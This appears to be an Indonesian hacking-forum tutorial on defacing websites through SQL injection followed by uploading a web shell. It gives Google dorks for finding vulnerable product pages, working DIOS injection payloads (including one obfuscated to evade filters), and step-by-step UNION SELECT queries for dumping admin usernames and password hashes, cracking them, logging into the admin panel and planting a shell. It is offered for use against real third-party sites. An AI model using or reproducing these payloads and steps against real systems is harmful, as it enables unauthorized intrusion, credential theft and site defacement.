Oke guys, kali ini gw bakal share tutorial bagaimana cara deface POC SQL Injection + Upload shell.

Dork :
- inurl:product_list.php?cid=
- inurl:product_view.php?id=
- inurl:productview.php?product_id=
- inurl:product-view.php?id=
- inurl:product/view.php?mn=
- inurl:product/view.php?id=
- inurl:shop-single.php?id=
- inurl:view_branches.php?sub_id=

Dios :

Basic dios : (select(@x)from(select(@x:=0x00),(select(0)From(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=coNcat(@x,0x3c62723e,table_name,0x203a3a20,column_name))))x)

Bypass dios : (select(@x)/*!50000from/**8**/*/(/*!50000select/**8**/*/(@x:=0x00),(select(0)/*!From/**8**/*/(/*!50000information_schema.columns/**8**/*/)/*!50000where/**8**/*/(table_schema=database/*data*//**8**/())and(0x00)in(@x:=/*!50000coNcat/**8**/*/(@x,0x3c62723e,/*!50000table_name/**8**/*/,0x203a3a20,/*!50000column_name/**8**/*/))))x)

Dios untuk dump u/p : (/*!50000SELECT*/(@x)FROM(/*!50000SELECT*/(@x:=0x00),(/*!50000SELECT*/(@x)FROM(tablenya)WHERE(@x)IN(@x:=/*!50000CONCAT*/(0x20,@x,colum1,0x203a3a20,column2,0x3c62723e))))x)

Langkah-langkah :

 
1. Dorking dulu ya guys, sampe dapet target, nah disini gw udah ada target buat di eksekusi.

 

 

2. Kalo udah dapet tinggal kasih single quote ' setelah param cth : .php?cat_id=406' kek gitu, kalo muncul error "You have an error in your sql syntax blabla" atau ada konten yang hilang tanda nya itu vuln ya guys, disini target gw errornya konten nya hilang.


3. Buat mastiin lagi kalo targetnya benar-benar vuln, kalian kasih balance buat normalin lagi websitenya cth : .php?cat_id=406'-- - kalo kek gitu masih aja error kalian hilangin single quote-nya.


4. Kalo udah tinggal lanjut order by sampai ketemu error-nya cth : .php?cat_id=406' order by 1-- - naikin angka-nya sampai ketemu error, nah disini target gw error-nya di 20.


5. Oke, kalian lanjut lagi ke union select buat nyari angka ajaib-nya cth : .php?cat_id=406' and 0 union select 1,2,3,4,5-- - , nah karena target gw tadi error-nya sampe di 20 jadi disini gw union select nya sampe 19 ga sampe 20 karena column nya cuman 19.


6. Nah kalo udah keliatan angka ajaibnya kalian tinggal inject. dump table sama columnnya dulu cth : .php?cat_id=406' and 0 union select 1,2,3,group_concat(table_name,column_name),5,6,7 from information_schema.columns where table_schema=database() kalo mau cepat kalian pake dios diatas, injectnya di angka ajaibnya ya.


7. Kalo dah keliatan table sama columnnya kalian cari table admin atau users yang di colummnya ada username sama password lalu kalian dump cth : .php?cat_id=406' and 0 union select 1,2,3,group_concat(namacolumnuser,0x3a3a3a,namacolumnpass),5,6,7 from nama_tablelu-- -.


8. Tinggal cari login adminnya biasa ada di : /admin | /administrator | /panel selebihnya gunakan otak kalian. kalo dah ketemu kita hash dulu passwordnya disini. paste in hash-nya terus tinggal kalian "SUBMIT & SEARCH" kalo ketemu hasilnya kek dibawah ini : 


9. Kalo udah tinggal login aja menggunakan username sama password yang udah di hash tadi, tekan enter dan akan di redirect ke dashboard admin.


10. Udah masuk di dashboard admin terserah kalian mau diapain, disini gw mau upload shell karena sesuai judul:v, caranya sama aja kek POC Regmem kalian cari tempat upload di dashboard adminnya, karena di target gw ada banyak tempat upload disini gw upload aja di salah satunya.


11. dan ini hasilnya :


Oke guys sekian dulu dari gw thanks yang udah baca, jangan lupa share.